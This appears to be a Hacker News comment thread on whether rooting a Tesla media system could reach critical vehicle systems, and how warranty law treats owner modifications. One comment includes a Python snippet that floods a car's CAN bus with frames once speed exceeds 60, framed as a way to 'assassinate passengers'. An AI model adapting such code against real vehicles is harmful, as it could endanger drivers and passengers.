[jokr004]

>Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.

I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.

[nickysielicki]

I wouldn't be so sure.

I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.

And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.

Eg: In Python

    from canard import can
    from canard.file import jsondb
    from canard.hw import socketcan

    # create and start device
    dev = socketcan.SocketCanDev("/dev/can0")
    dev.start()

    # create our DoS frame
    frame = can.Frame(id=0)
    frame.dlc = 8

    # load tesla can spec, eg: from [4]
    # CAN3, ID 0x0256
    b = parser.parse('tesla.json')

    while True:
      rec = dev.recv()
      speedo = b.parse_frame(rec)
      # assassinate passengers
      if (speedo.speed > 60):
        while True:
          dev.send(frame) 

[1]: https://www.blackhat.com/docs/asia-15/materials/asia-15-Even...

[2]: http://security.stackexchange.com/questions/88724/is-there-a...

[3]: https://github.com/ericevenchick/CANard

[4]: http://skie.net/uploads/TeslaCAN/Tesla%20Model%20S%20CAN%20D...

[regularfry]

Sensible cars have a device bridging high and low security networks, forwarding data from one to the other, specifically so that a misbehaving media device or light system can't clobber the brakes or ECU. No idea if the Tesla does this or not, but it's a fairly standard approach.

[Hemera-]

Yes, it has a gateway between the high level stuff and the low level stuff. It's fairly secure too. You can't just make calls to the can bus all willy-nilly either.

[nickysielicki]

> You can't just make calls to the can bus all willy-nilly either.

What do you mean by that? I would think that once you get UID=0 nothing can stop you from doing whatever you want to that device.

[0942v8653]

It's a completely different computer—compare it to your typical web browser/web server model. The media computer can request display the battery information (the browser can get a list of products) but it cannot hit the accelerator (the browser cannot read other users' personal information). Even if you have root on the media center (your laptop), that doesn't make it so you can run any and all commands on the computer that regulates steering and acceleration (the web server).

[snowwindwaves]

there is a gateway between the media center canbus and the critical canbus. the gateway buffers all the data from the critical canbus and rate limits any requests for data which isn't broadcast regularly on the critical canbus.

You would have to get UID=0 on the canbus gateway to make requests 'willy nilly' on the critical canbus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.

edit: clarity

[tacticus]

though wasn't the chrysler attack through one of these gateways?

[NotSammyHagar]

The chrysler was a completely different system, but it was indeed infecting the car from the radio / entertainment system. The tesla is completely different from that. They have one entire computer system that runs the "entertainment console". You can even reboot it while you are driving and nothing happens (this is by design of course). The driving controls are totally separated. The only thing you notice when you reboot that console if that the radio goes off, the display goes black during the reboot (10 seconds). Then it comes back and all is well. Press both turning cylinder controls on the steering wheel for a few seconds to start the reboot. They designed it very well. That doesn't mean it is perfect, but they have approached security correctly as far as I can tell from outside. They pay for exploits too - see https://bugcrowd.com/tesla. They have hired security researchers to work on their system and attack it.

As a tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.

And I really wish they'd update their web browser, and even more wish they supported linux. Maybe the chromebook os support will be secure enough for android apps that even tesla could use it.

[deegles]

But it might fubar your warranty...

"Your honor, we were not responsible for that AutoPilot crash because the driver did an unauthorized modification of the car's software!"

[jeena]

This should be handled like we handle replacing the breaks in your car if you do it yourself.

[fludlight]

How is that handled?

[arohner]

This is part of the Magnuson Moss Warranty Act: https://en.wikipedia.org/wiki/Magnuson%E2%80%93Moss_Warranty...

In effect, the manufacturer can only deny warranty claims for a specific part iff the consumer's aftermarket repair/modifications were responsible for the warrantied part failing. i.e. "I tinted the windows, and now the brakes are failing" does not result in warranty claims on the brakes being denied. However, "I replaced the brake pads [with faulty pads], and now the brake rotors are failing" can result in a denied warranty claim.

[AdamJacobMuller]

While I appreciate the sentiment there, that seems like its ripe for protracted litigation (which will never benefit the consumer).

Plus, in a connected car situation, its going to be very difficult to prove that one thing didn't cause another.

Because you rooted the media control system, your unapproved software had the ability to speak to the brake control system and apply more-than-designed force to the brakes and thereby caused this damage.

Could you be forced into proving a negative?

That said, I think most of these things happen in the context of class action suits. In a class action, its going to be hard to blame or exclude the 1% of the class that has rooted their car.

[annnnd]

Not sure why you are being downvoted, you present a valid point.

The trouble is that with mechanical parts it is usually very easy to see connections between elements - not so in digital world. I think the direction the car makers should take is to develop "microservices" with strict APIs, strict access lists and a guardian which double-checks if some requested operation really makes sense. That way if you root a media center you can't mess with the engine from there.

EDIT: I see from other comments that Tesla apparently does something similar. Too bad it's not standardized and open, but at least approach is right...

[msandford]

I don't know, but if you decide to tint your windows it doesn't somehow magically invalidate your powertrain warranty.